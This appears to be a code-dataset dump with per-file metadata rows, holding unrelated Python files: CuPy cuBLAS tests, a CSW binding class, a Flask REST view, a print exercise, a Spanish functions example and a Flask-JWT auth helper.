| 21.153846 | 86 | 0.676364 | 119 | 825 | 4.689076 | 0.436975 | 0.16129 | 0.15233 | 0.188172 | 0.15233 | 0.15233 | 0.15233 | 0.15233 | 0.15233 | 0.15233 | 0 | 0.005926 | 0.181818 | 825 | 38 | 87 | 21.710526 | 0.820741 | 0.164848 | 0 | 0.413793 | 0 | 0 | 0.243045 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.034483 | 0 | 0 | 0 | 0.689655 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 2 |
fb32689f50782a5ff37cf378f6a450894a0dc23f | 22,922 | py | Python | tests/cupy_tests/test_cublas.py | Onkar627/cupy | 8eef1ad5393c0a92c5065bc05137bf997f37044a | [
"MIT"
] | 1 | 2022-01-12T22:57:54.000Z | 2022-01-12T22:57:54.000Z | tests/cupy_tests/test_cublas.py | Onkar627/cupy | 8eef1ad5393c0a92c5065bc05137bf997f37044a | [
"MIT"
] | null | null | null | tests/cupy_tests/test_cublas.py | Onkar627/cupy | 8eef1ad5393c0a92c5065bc05137bf997f37044a | [
"MIT"
] | 1 | 2022-03-21T20:19:12.000Z | 2022-03-21T20:19:12.000Z | import numpy
import pytest
import cupy
from cupy import cublas
from cupy import testing
from cupy.testing import _attr
@testing.parameterize(*testing.product({
'dtype': ['float32', 'float64', 'complex64', 'complex128'],
'n': [10, 33, 100],
'bs': [None, 1, 10],
'nrhs': [None, 1, 10],
}))
@_attr.gpu
class TestBatchedGesv:
_tol = {'f': 5e-5, 'd': 1e-12}
def _make_random_matrices(self, shape, xp):
a = testing.shaped_random(shape, xp, dtype=self.r_dtype, scale=1)
if self.dtype.char in 'FD':
a = a + 1j * testing.shaped_random(shape, xp, dtype=self.r_dtype,
scale=1)
return a
def _make_well_conditioned_matrices(self, shape):
a = self._make_random_matrices(shape, numpy)
u, s, vh = numpy.linalg.svd(a)
s = testing.shaped_random(s.shape, numpy, dtype=self.r_dtype,
scale=1) + 1
a = numpy.einsum('...ik,...k,...kj->...ij', u, s, vh)
return cupy.array(a)
@pytest.fixture(autouse=True)
def setUp(self):
self.dtype = numpy.dtype(self.dtype)
if self.dtype.char in 'fF':
self.r_dtype = numpy.float32
else:
self.r_dtype = numpy.float64
n = self.n
bs = 1 if self.bs is None else self.bs
nrhs = 1 if self.nrhs is None else self.nrhs
a = self._make_well_conditioned_matrices((bs, n, n))
x = self._make_random_matrices((bs, n, nrhs), cupy)
b = cupy.matmul(a, x)
a_shape = (n, n) if self.bs is None else (bs, n, n)
b_shape = [n]
if self.bs is not None:
b_shape.insert(0, bs)
if self.nrhs is not None:
b_shape.append(nrhs)
self.a = a.reshape(a_shape)
self.b = b.reshape(b_shape)
self.x_ref = x.reshape(b_shape)
if self.r_dtype == numpy.float32:
self.tol = self._tol['f']
elif self.r_dtype == numpy.float64:
self.tol = self._tol['d']
def test_batched_gesv(self):
x = cublas.batched_gesv(self.a, self.b)
cupy.testing.assert_allclose(x, self.x_ref,
rtol=self.tol, atol=self.tol)
@testing.parameterize(*testing.product({
'dtype': ['float32', 'float64', 'complex64', 'complex128'],
'n': [10, 100],
'mode': [None, numpy, cupy],
}))
@_attr.gpu
class TestLevel1Functions:
_tol = {'f': 1e-5, 'd': 1e-12}
@pytest.fixture(autouse=True)
def setUp(self):
self.dtype = numpy.dtype(self.dtype)
self.tol = self._tol[self.dtype.char.lower()]
def _make_random_vector(self):
return testing.shaped_random((self.n,), cupy, dtype=self.dtype)
def _make_out(self, dtype):
out = None
if self.mode is not None:
out = self.mode.empty([], dtype=dtype)
return out
def _check_pointer(self, a, b):
if a is not None and b is not None:
assert self._get_pointer(a) == self._get_pointer(b)
def _get_pointer(self, a):
if isinstance(a, cupy.ndarray):
return a.data.ptr
else:
return a.ctypes.data
def test_iamax(self):
x = self._make_random_vector()
ref = cupy.argmax(cupy.absolute(x.real) + cupy.absolute(x.imag))
out = self._make_out('i')
res = cublas.iamax(x, out=out)
self._check_pointer(res, out)
# Note: iamax returns 1-based index
cupy.testing.assert_array_equal(res - 1, ref)
def test_iamin(self):
x = self._make_random_vector()
ref = cupy.argmin(cupy.absolute(x.real) + cupy.absolute(x.imag))
out = self._make_out('i')
res = cublas.iamin(x, out=out)
self._check_pointer(res, out)
# Note: iamin returns 1-based index
cupy.testing.assert_array_equal(res - 1, ref)
def test_asum(self):
x = self._make_random_vector()
ref = cupy.sum(cupy.absolute(x.real) + cupy.absolute(x.imag))
out = self._make_out(self.dtype.char.lower())
res = cublas.asum(x, out=out)
self._check_pointer(res, out)
cupy.testing.assert_allclose(res, ref, rtol=self.tol, atol=self.tol)
def test_axpy(self):
x = self._make_random_vector()
y = self._make_random_vector()
a = 1.1
if self.dtype.char in 'FD':
a = a - 1j * 0.9
ref = a * x + y
if self.mode is not None:
a = self.mode.array(a, dtype=self.dtype)
cublas.axpy(a, x, y)
cupy.testing.assert_allclose(y, ref, rtol=self.tol, atol=self.tol)
def test_dot(self):
x = self._make_random_vector()
y = self._make_random_vector()
ref = x.dot(y)
out = self._make_out(self.dtype)
if self.dtype.char in 'FD':
with pytest.raises(TypeError):
res = cublas.dot(x, y, out=out)
return
res = cublas.dot(x, y, out=out)
self._check_pointer(res, out)
cupy.testing.assert_allclose(res, ref, rtol=self.tol, atol=self.tol)
def test_dotu(self):
x = self._make_random_vector()
y = self._make_random_vector()
ref = x.dot(y)
out = self._make_out(self.dtype)
res = cublas.dotu(x, y, out=out)
self._check_pointer(res, out)
cupy.testing.assert_allclose(res, ref, rtol=self.tol, atol=self.tol)
def test_dotc(self):
x = self._make_random_vector()
y = self._make_random_vector()
ref = x.conj().dot(y)
out = self._make_out(self.dtype)
res = cublas.dotc(x, y, out=out)
self._check_pointer(res, out)
cupy.testing.assert_allclose(res, ref, rtol=self.tol, atol=self.tol)
def test_nrm2(self):
x = self._make_random_vector()
ref = cupy.linalg.norm(x)
out = self._make_out(self.dtype.char.lower())
res = cublas.nrm2(x, out=out)
self._check_pointer(res, out)
cupy.testing.assert_allclose(res, ref, rtol=self.tol, atol=self.tol)
def test_scal(self):
x = self._make_random_vector()
a = 1.1
if self.dtype.char in 'FD':
a = a - 1j * 0.9
ref = a * x
if self.mode is not None:
a = self.mode.array(a, dtype=self.dtype)
cublas.scal(a, x)
cupy.testing.assert_allclose(x, ref, rtol=self.tol, atol=self.tol)
@testing.parameterize(*testing.product({
'dtype': ['float32', 'float64', 'complex64', 'complex128'],
'shape': [(10, 9), (9, 10)],
'trans': ['N', 'T', 'H'],
'order': ['C', 'F'],
'mode': [None, numpy, cupy],
}))
@_attr.gpu
class TestGemv:
_tol = {'f': 1e-5, 'd': 1e-12}
@pytest.fixture(autouse=True)
def setUp(self):
self.dtype = numpy.dtype(self.dtype)
self.tol = self._tol[self.dtype.char.lower()]
def test_gemv(self):
a = testing.shaped_random(self.shape, cupy, dtype=self.dtype,
order=self.order)
if self.trans == 'N':
ylen, xlen = self.shape
else:
xlen, ylen = self.shape
x = testing.shaped_random((xlen,), cupy, dtype=self.dtype)
y = testing.shaped_random((ylen,), cupy, dtype=self.dtype)
alpha = 0.9
beta = 0.8
if self.dtype.char in 'FD':
alpha = alpha - 1j * 0.7
beta = beta - 1j * 0.6
if self.trans == 'N':
ref = alpha * a.dot(x) + beta * y
elif self.trans == 'T':
ref = alpha * a.T.dot(x) + beta * y
elif self.trans == 'H':
ref = alpha * a.T.conj().dot(x) + beta * y
if self.mode is not None:
alpha = self.mode.array(alpha)
beta = self.mode.array(beta)
cupy.cublas.gemv(self.trans, alpha, a, x, beta, y)
cupy.testing.assert_allclose(y, ref, rtol=self.tol, atol=self.tol)
@testing.parameterize(*testing.product({
'rank': [5, 9],
'band': [0, 1, 3],
'lower': [0, 1],
'order': ['C', 'F'],
'mode': [None, numpy, cupy],
}))
@_attr.gpu
class TestSbmv:
_tol = {'f': 1e-5, 'd': 1e-12}
def _gen2band(self, A, ku=0, kl=0, order='C'):
assert A.ndim == 2
n, m = A.shape
ldm, lda = n, 1 + ku + kl
B = numpy.zeros((lda, ldm), dtype=A.dtype, order=order)
for j in range(n):
k = ku - j
for i in range(max(0, j-ku), min(m, j + kl + 1)):
B[(k + i), j] = A[i, j]
return B
@testing.for_dtypes('fd')
def test_sbmv(self, dtype):
dtype = numpy.dtype(dtype)
alpha, beta = 3.0, 2.0
n, k = self.rank, self.band
a = numpy.eye(n, n, 0, dtype, self.order)
a *= numpy.random.randint(20)
for i in range(1, k+1):
band = numpy.random.randint(20, size=n-i)
a += numpy.diag(band, k=+i)
a += numpy.diag(band, k=-i)
x = numpy.random.randint(20, size=n).astype(a.dtype)
y = numpy.random.randint(20, size=n).astype(a.dtype)
ku, kl = k, 0
if self.lower == 1:
ku, kl = kl, ku
b = self._gen2band(a, ku, kl)
a, b = cupy.asarray(a), cupy.asarray(b)
x, y = cupy.asarray(x), cupy.asarray(y)
ref = alpha * a.dot(x) + beta * y
if self.mode is not None:
alpha = self.mode.array(alpha)
beta = self.mode.array(beta)
y_ret = cupy.cublas.sbmv(k, alpha, b, x, beta, y, lower=self.lower)
tol = self._tol[dtype.char.lower()]
cupy.testing.assert_allclose(y, ref, rtol=tol, atol=tol)
cupy.testing.assert_allclose(y_ret, ref, rtol=tol, atol=tol)
@testing.parameterize(*testing.product({
'dtype': ['float32', 'float64', 'complex64', 'complex128'],
'shape': [(10, 9), (9, 10)],
'order': ['C', 'F'],
'mode': [None, numpy, cupy],
}))
@_attr.gpu
class TestGer:
_tol = {'f': 1e-5, 'd': 1e-12}
@pytest.fixture(autouse=True)
def setUp(self):
self.dtype = numpy.dtype(self.dtype)
self.tol = self._tol[self.dtype.char.lower()]
self.a = testing.shaped_random(self.shape, cupy, dtype=self.dtype,
order=self.order)
self.x = testing.shaped_random((self.shape[0],), cupy,
dtype=self.dtype)
self.y = testing.shaped_random((self.shape[1],), cupy,
dtype=self.dtype)
self.alpha = 1.1
if self.dtype.char in 'FD':
self.alpha = self.alpha - 1j * 0.9
def test_ger(self):
if self.dtype.char in 'FD':
with pytest.raises(TypeError):
cublas.ger(self.alpha, self.x, self.y, self.a)
return
ref = self.alpha * cupy.outer(self.x, self.y) + self.a
if self.mode is not None:
self.alpha = self.mode.array(self.alpha)
cublas.ger(self.alpha, self.x, self.y, self.a)
cupy.testing.assert_allclose(self.a, ref, rtol=self.tol, atol=self.tol)
def test_geru(self):
ref = self.alpha * cupy.outer(self.x, self.y) + self.a
if self.mode is not None:
self.alpha = self.mode.array(self.alpha)
cublas.geru(self.alpha, self.x, self.y, self.a)
cupy.testing.assert_allclose(self.a, ref, rtol=self.tol, atol=self.tol)
def test_gerc(self):
ref = self.alpha * cupy.outer(self.x, self.y.conj()) + self.a
if self.mode is not None:
self.alpha = self.mode.array(self.alpha)
cublas.gerc(self.alpha, self.x, self.y, self.a)
cupy.testing.assert_allclose(self.a, ref, rtol=self.tol, atol=self.tol)
@testing.parameterize(*testing.product({
'nk': [(5, 9), (9, 5)],
'transa': ['N', 'T'],
'ordera': ['F', 'C'],
'orderc': ['F', 'C'],
'lower': [0, 1],
'mode': [None, numpy, cupy]
}))
@_attr.gpu
class TestSyrk:
_tol = {'f': 1e-5, 'd': 1e-12}
def _make_matrix(self, m, n, trans, order, dtype):
if trans == 'N':
shape = (m, n)
else:
shape = (n, m)
return testing.shaped_random(shape, cupy, dtype=dtype, order=order,
scale=1.0)
def _trans_matrix(self, a, trans):
if trans == 'N':
return a
return a.T
@testing.for_dtypes('fdFD')
def test_syrk(self, dtype):
dtype = numpy.dtype(dtype)
tol = self._tol[dtype.char.lower()]
alpha, beta = 3.0, 2.0
if dtype.char in 'FD':
alpha = alpha - 1j * 2.0
beta = beta + 1j * 5.0
n, k = self.nk
a = self._make_matrix(n, k, self.transa, self.ordera, dtype)
aa = self._trans_matrix(a, self.transa)
ref = alpha * aa.dot(aa.T) # beta is used as a placeholder only
c = cublas.syrk(self.transa, a, alpha=alpha, beta=beta,
lower=self.lower)
rr, cc = cupy.asnumpy(ref), cupy.asnumpy(c)
if self.lower:
rr[numpy.triu_indices_from(rr, 1)] = 0
else:
rr[numpy.tril_indices_from(rr, -1)] = 0
rru = rr[numpy.triu_indices_from(rr)]
ccu = cc[numpy.triu_indices_from(cc)]
rrl = rr[numpy.tril_indices_from(rr)]
ccl = cc[numpy.tril_indices_from(cc)]
cupy.testing.assert_allclose(ccu, rru, rtol=tol, atol=tol)
cupy.testing.assert_allclose(ccl, rrl, rtol=tol, atol=tol)
@testing.for_dtypes('fdFD')
def test_syrk_out(self, dtype):
dtype = numpy.dtype(dtype)
tol = self._tol[dtype.char.lower()]
alpha, beta = 2.3, 1.7
if dtype.char in 'FD':
alpha = alpha - 1j * 0.7
beta = beta + 1j * 2.3
n, k = self.nk
a = self._make_matrix(n, k, self.transa, self.ordera, dtype)
aa = self._trans_matrix(a, self.transa)
m = aa.shape[0]
c = self._make_matrix(m, m, 'N', self.orderc, dtype)
c0 = cupy.array(c)
ref = alpha * aa.dot(aa.T) + beta * c
cublas.syrk(self.transa, a, out=c, alpha=alpha, beta=beta,
lower=self.lower)
rr, c0, cc = cupy.asnumpy(ref), cupy.asnumpy(c0), cupy.asnumpy(c)
if self.lower:
trii = numpy.triu_indices_from(rr, 1)
else:
trii = numpy.tril_indices_from(rr, -1)
rr[trii] = c0[trii]
rru = rr[numpy.triu_indices_from(rr)]
ccu = cc[numpy.triu_indices_from(cc)]
rrl = rr[numpy.tril_indices_from(rr)]
ccl = cc[numpy.tril_indices_from(cc)]
cupy.testing.assert_allclose(ccu, rru, rtol=tol, atol=tol)
cupy.testing.assert_allclose(ccl, rrl, rtol=tol, atol=tol)
@testing.parameterize(*testing.product({
'mnk': [(8, 9, 10), (10, 9, 8)],
'transa': ['N', 'T', 'H'],
'transb': ['N', 'T', 'H'],
'ordera': ['C', 'F'],
'orderb': ['C', 'F'],
'orderc': ['C', 'F'],
'mode': [None, numpy, cupy],
}))
@_attr.gpu
class TestGemmAndGeam:
_tol = {'f': 1e-5, 'd': 1e-12}
def _make_matrix(self, m, n, trans, order, dtype):
if trans == 'N':
shape = (m, n)
else:
shape = (n, m)
return testing.shaped_random(shape, cupy, dtype=dtype, order=order,
scale=1.0)
def _trans_matrix(self, a, trans):
if trans == 'T':
a = a.T
elif trans == 'H':
a = a.T.conj()
return a
@testing.for_dtypes('fdFD')
def test_gemm(self, dtype):
if not (self.mode is None and self.orderc == 'C'):
pytest.skip()
dtype = numpy.dtype(dtype)
tol = self._tol[dtype.char.lower()]
m, n, k = self.mnk
a = self._make_matrix(m, k, self.transa, self.ordera, dtype)
b = self._make_matrix(k, n, self.transb, self.orderb, dtype)
aa = self._trans_matrix(a, self.transa)
bb = self._trans_matrix(b, self.transb)
ref = aa.dot(bb)
c = cublas.gemm(self.transa, self.transb, a, b)
cupy.testing.assert_allclose(c, ref, rtol=tol, atol=tol)
@testing.for_dtypes('fdFD')
def test_gemm_out(self, dtype):
dtype = numpy.dtype(dtype)
tol = self._tol[dtype.char.lower()]
m, n, k = self.mnk
a = self._make_matrix(m, k, self.transa, self.ordera, dtype)
b = self._make_matrix(k, n, self.transb, self.orderb, dtype)
c = self._make_matrix(m, n, 'N', self.orderc, dtype)
alpha = 0.9
beta = 0.8
if dtype.char in 'FD':
alpha = alpha - 1j * 0.7
beta = beta - 1j * 0.6
aa = self._trans_matrix(a, self.transa)
bb = self._trans_matrix(b, self.transb)
ref = alpha * aa.dot(bb) + beta * c
if self.mode is not None:
alpha = self.mode.array(alpha)
beta = self.mode.array(beta)
cublas.gemm(self.transa, self.transb, a, b, out=c,
alpha=alpha, beta=beta)
cupy.testing.assert_allclose(c, ref, rtol=tol, atol=tol)
@testing.for_dtypes('fdFD')
def test_geam(self, dtype):
if self.orderc != 'F':
pytest.skip()
dtype = numpy.dtype(dtype)
tol = self._tol[dtype.char.lower()]
m, n, _ = self.mnk
a = self._make_matrix(m, n, self.transa, self.ordera, dtype)
b = self._make_matrix(m, n, self.transb, self.orderb, dtype)
alpha = 0.9
beta = 0.8
if dtype.char in 'FD':
alpha = alpha - 1j * 0.7
beta = beta - 1j * 0.6
aa = self._trans_matrix(a, self.transa)
bb = self._trans_matrix(b, self.transb)
ref = alpha * aa + beta * bb
if self.mode is not None:
alpha = self.mode.array(alpha)
beta = self.mode.array(beta)
c = cublas.geam(self.transa, self.transb, alpha, a, beta, b)
cupy.testing.assert_allclose(c, ref, rtol=tol, atol=tol)
@testing.for_dtypes('fdFD')
def test_geam_out(self, dtype):
dtype = numpy.dtype(dtype)
tol = self._tol[dtype.char.lower()]
m, n, _ = self.mnk
a = self._make_matrix(m, n, self.transa, self.ordera, dtype)
b = self._make_matrix(m, n, self.transb, self.orderb, dtype)
c = self._make_matrix(m, n, 'N', self.orderc, dtype)
alpha = 0.9
beta = 0.8
if dtype.char in 'FD':
alpha = alpha - 1j * 0.7
beta = beta - 1j * 0.6
aa = self._trans_matrix(a, self.transa)
bb = self._trans_matrix(b, self.transb)
ref = alpha * aa + beta * bb
if self.mode is not None:
alpha = self.mode.array(alpha)
beta = self.mode.array(beta)
cublas.geam(self.transa, self.transb, alpha, a, beta, b, out=c)
cupy.testing.assert_allclose(c, ref, rtol=tol, atol=tol)
@testing.parameterize(*testing.product({
'shape': [(9, 10), (10, 9)],
'side': ['L', 'R'],
'ordera': ['C', 'F'],
'orderc': ['C', 'F'],
}))
@_attr.gpu
class TestDgmm:
_tol = {'f': 1e-5, 'd': 1e-12}
def _setup(self, dtype, xdim=1):
self.dtype = numpy.dtype(dtype)
self.tol = self._tol[self.dtype.char.lower()]
self.a = testing.shaped_random(self.shape, cupy, dtype=dtype,
order=self.ordera, scale=1.0)
if self.side == 'L':
xlen = self.shape[0]
elif self.side == 'R':
xlen = self.shape[1]
if xdim == 0:
self.x = cupy.array(1.1, dtype=dtype)
elif xdim == 1:
self.x = testing.shaped_random(
(xlen,), cupy, dtype=dtype, scale=1.0)
elif xdim == 2:
self.x = testing.shaped_random(
(xlen, xlen), cupy, dtype=dtype, scale=1.0)
@testing.for_dtypes('fdFD')
def test_dgmm(self, dtype):
if self.orderc != 'F':
pytest.skip()
self._setup(dtype)
if self.side == 'L':
ref = cupy.diag(self.x) @ self.a
elif self.side == 'R':
ref = self.a @ cupy.diag(self.x)
c = cublas.dgmm(self.side, self.a, self.x)
cupy.testing.assert_allclose(c, ref, rtol=self.tol, atol=self.tol)
@testing.for_dtypes('fdFD')
def test_dgmm_out(self, dtype):
self._setup(dtype)
if self.side == 'L':
ref = cupy.diag(self.x) @ self.a
elif self.side == 'R':
ref = self.a @ cupy.diag(self.x)
c = cupy.empty(self.shape, order=self.orderc, dtype=dtype)
cublas.dgmm(self.side, self.a, self.x, out=c)
cupy.testing.assert_allclose(c, ref, rtol=self.tol, atol=self.tol)
@testing.for_dtypes('fdFD')
def test_dgmm_inplace(self, dtype):
if self.orderc != 'F':
pytest.skip()
self._setup(dtype)
if self.side == 'L':
ref = cupy.diag(self.x) @ self.a
elif self.side == 'R':
ref = self.a @ cupy.diag(self.x)
cublas.dgmm(self.side, self.a, self.x, out=self.a)
cupy.testing.assert_allclose(self.a, ref, rtol=self.tol, atol=self.tol)
_dgmm_incx_minus_one_hip_skip_condition = [
('C', 'F', (9, 10), 'R'),
('C', 'F', (10, 9), 'R'),
('F', 'F', (9, 10), 'L'),
('F', 'F', (10, 9), 'L'),
]
def _check_dgmm_incx_minus_one_hip_skip_condition(self):
return (self.ordera, self.orderc, self.shape, self.side) in \
self._dgmm_incx_minus_one_hip_skip_condition
@testing.for_dtypes('fdFD')
def test_dgmm_incx_minus_one(self, dtype):
if self.orderc != 'F':
pytest.skip()
if cupy.cuda.runtime.is_hip:
if self._check_dgmm_incx_minus_one_hip_skip_condition():
pytest.xfail('HIP dgmm may have a bug')
self._setup(dtype)
if self.side == 'L':
ref = cupy.diag(self.x[::-1]) @ self.a
elif self.side == 'R':
ref = self.a @ cupy.diag(self.x[::-1])
c = cublas.dgmm(self.side, self.a, self.x, incx=-1)
cupy.testing.assert_allclose(c, ref, rtol=self.tol, atol=self.tol)
@testing.for_dtypes('fdFD')
def test_dgmm_x_scalar(self, dtype):
if self.orderc != 'F':
pytest.skip()
self._setup(dtype, xdim=0)
ref = self.x * self.a
c = cublas.dgmm(self.side, self.a, self.x, incx=0)
cupy.testing.assert_allclose(c, ref, rtol=self.tol, atol=self.tol)
@testing.for_dtypes('fdFD')
def test_dgmm_x_matrix(self, dtype):
if self.orderc != 'F':
pytest.skip()
self._setup(dtype, xdim=2)
if self.side == 'L':
ref = cupy.diag(cupy.diag(self.x)) @ self.a
incx = self.shape[0] + 1
elif self.side == 'R':
ref = self.a @ cupy.diag(cupy.diag(self.x))
incx = self.shape[1] + 1
c = cublas.dgmm(self.side, self.a, self.x, incx=incx)
cupy.testing.assert_allclose(c, ref, rtol=self.tol, atol=self.tol)
| 35.871674 | 79 | 0.547596 | 3,308 | 22,922 | 3.683797 | 0.069226 | 0.031594 | 0.041851 | 0.057443 | 0.784753 | 0.757344 | 0.715411 | 0.666749 | 0.622107 | 0.594042 | 0 | 0.01925 | 0.299712 | 22,922 | 638 | 80 | 35.9279 | 0.739908 | 0.00445 | 0 | 0.576655 | 0 | 0 | 0.02301 | 0.001008 | 0 | 0 | 0 | 0 | 0.055749 | 1 | 0.076655 | false | 0 | 0.010453 | 0.003484 | 0.142857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
fb3c3876b330f5a1310fa02ca86fedafa73ed588 | 273 | py | Python | catalog/bindings/csw/brief_record.py | NIVANorge/s-enda-playground | 56ae0a8978f0ba8a5546330786c882c31e17757a | [
"Apache-2.0"
] | null | null | null | catalog/bindings/csw/brief_record.py | NIVANorge/s-enda-playground | 56ae0a8978f0ba8a5546330786c882c31e17757a | [
"Apache-2.0"
] | null | null | null | catalog/bindings/csw/brief_record.py | NIVANorge/s-enda-playground | 56ae0a8978f0ba8a5546330786c882c31e17757a | [
"Apache-2.0"
] | null | null | null | from dataclasses import dataclass
from bindings.csw.brief_record_type import BriefRecordType
__NAMESPACE__ = "http://www.opengis.net/cat/csw/2.0.2"
@dataclass
class BriefRecord(BriefRecordType):
class Meta:
namespace = "http://www.opengis.net/cat/csw/2.0.2"
| 24.818182 | 58 | 0.754579 | 38 | 273 | 5.263158 | 0.552632 | 0.13 | 0.16 | 0.23 | 0.35 | 0.35 | 0.35 | 0.35 | 0.35 | 0.35 | 0 | 0.025105 | 0.124542 | 273 | 10 | 59 | 27.3 | 0.811715 | 0 | 0 | 0 | 0 | 0 | 0.263736 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.285714 | 0 | 0.571429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
348d2d60fb5385e97d0dc27346784f7b73fdadac | 331 | py | Python | example/demo/book/views.py | iwwxiong/flask_restapi | 57fca3bf07d913b31b6b7ef877328b0e07056c39 | [
"MIT"
] | 6 | 2019-04-23T02:18:55.000Z | 2019-12-10T13:16:21.000Z | example/demo/book/views.py | dracarysX/flask_scaffold | 57fca3bf07d913b31b6b7ef877328b0e07056c39 | [
"MIT"
] | null | null | null | example/demo/book/views.py | dracarysX/flask_scaffold | 57fca3bf07d913b31b6b7ef877328b0e07056c39 | [
"MIT"
] | 3 | 2019-05-22T06:00:17.000Z | 2020-01-14T17:02:35.000Z | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# flask_restapi import
from flask_restapi.views import APIMethodView
from .models import Book
from .forms import BookForm
class BookView(APIMethodView):
model = Book
paginate_by = 10
context_object_name = 'items'
pk_url_kwarg = 'book_id'
form_class = BookForm
| 19.470588 | 45 | 0.716012 | 44 | 331 | 5.181818 | 0.727273 | 0.105263 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011236 | 0.193353 | 331 | 16 | 46 | 20.6875 | 0.842697 | 0.193353 | 0 | 0 | 0 | 0 | 0.045455 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
3492885ac8a900a114a775185286f143d7123ed9 | 236 | py | Python | data/python/pattern_12/code.py | MKAbuMattar/grammind-api | ccf6e9898f50f9e4c7671abecf65029198e2dc72 | [
"MIT"
] | 3 | 2021-12-29T13:03:27.000Z | 2021-12-31T20:27:17.000Z | data/python/pattern_12/code.py | MKAbuMattar/grammind-api | ccf6e9898f50f9e4c7671abecf65029198e2dc72 | [
"MIT"
] | 2 | 2022-01-15T13:08:13.000Z | 2022-01-18T19:41:07.000Z | data/python/pattern_12/code.py | MKAbuMattar/grammind-api | ccf6e9898f50f9e4c7671abecf65029198e2dc72 | [
"MIT"
] | null | null | null | #MAIN PROGRAM STARTS HERE:
num = int(input('Enter the number of rows and columns for the square: '))
for x in range(0, num):
i = x + 1
for y in range(0, num):
print ('{} '.format(i), end='')
i += num
print() | 26.222222 | 73 | 0.555085 | 39 | 236 | 3.358974 | 0.666667 | 0.10687 | 0.122137 | 0.167939 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017857 | 0.288136 | 236 | 9 | 74 | 26.222222 | 0.761905 | 0.105932 | 0 | 0 | 0 | 0 | 0.265403 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.285714 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
349c048a588296bb67dea9d1d337e93b39772ac1 | 381 | py | Python | 03_Avanzado/09_CursoBasico_Python/codigo/funciones.py | LeoSan/CarreraFundamentosProgramacion_Platzi_2021 | 9db6ac33a755f855fbb9c41a9bd0e02712f37cb3 | [
"MIT"
] | null | null | null | 03_Avanzado/09_CursoBasico_Python/codigo/funciones.py | LeoSan/CarreraFundamentosProgramacion_Platzi_2021 | 9db6ac33a755f855fbb9c41a9bd0e02712f37cb3 | [
"MIT"
] | null | null | null | 03_Avanzado/09_CursoBasico_Python/codigo/funciones.py | LeoSan/CarreraFundamentosProgramacion_Platzi_2021 | 9db6ac33a755f855fbb9c41a9bd0e02712f37cb3 | [
"MIT"
] | null | null | null | #Programa ejemplo para usar función
#funcion sin parametros
def imprimir_mensaje():
print("Mensaje especial:")
print("Estoy aprendiendo:")
imprimir_mensaje()
#funcion con parametros
valorA= "Hola mundo"
valorB= "Función con parametros"
def imprimir_mensaje_param(mensaje1, mensaje2):
print(mensaje1)
print(mensaje2)
imprimir_mensaje_param(valorA, valorB)
| 20.052632 | 47 | 0.755906 | 44 | 381 | 6.409091 | 0.522727 | 0.212766 | 0.148936 | 0.198582 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012384 | 0.152231 | 381 | 18 | 48 | 21.166667 | 0.860681 | 0.207349 | 0 | 0 | 0 | 0 | 0.22408 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0 | 0 | 0.2 | 0.4 | 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
34a22dd4ad9ab46d6938c8ba8be9e6f6b3432bf1 | 497 | py | Python | quickkart_api/auth.py | envaleed/quick-kart-api-deploy | 2b962dce3bc5ba19d4e90cb86822c016d51f65c2 | [
"MIT"
] | null | null | null | quickkart_api/auth.py | envaleed/quick-kart-api-deploy | 2b962dce3bc5ba19d4e90cb86822c016d51f65c2 | [
"MIT"
] | null | null | null | quickkart_api/auth.py | envaleed/quick-kart-api-deploy | 2b962dce3bc5ba19d4e90cb86822c016d51f65c2 | [
"MIT"
] | null | null | null | from quickkart_api import app
from quickkart_api.models import Users
from flask_jwt import JWT, jwt_required, current_identity
from flask import abort
def authenticate(username, password):
user = Users.query.filter_by(username=username).first()
if user and user.check_password(password):
return user
return abort(500, "Authentication failed")
def identity(payload):
return Users.query.filter(Users.id == payload['identity']).scalar()
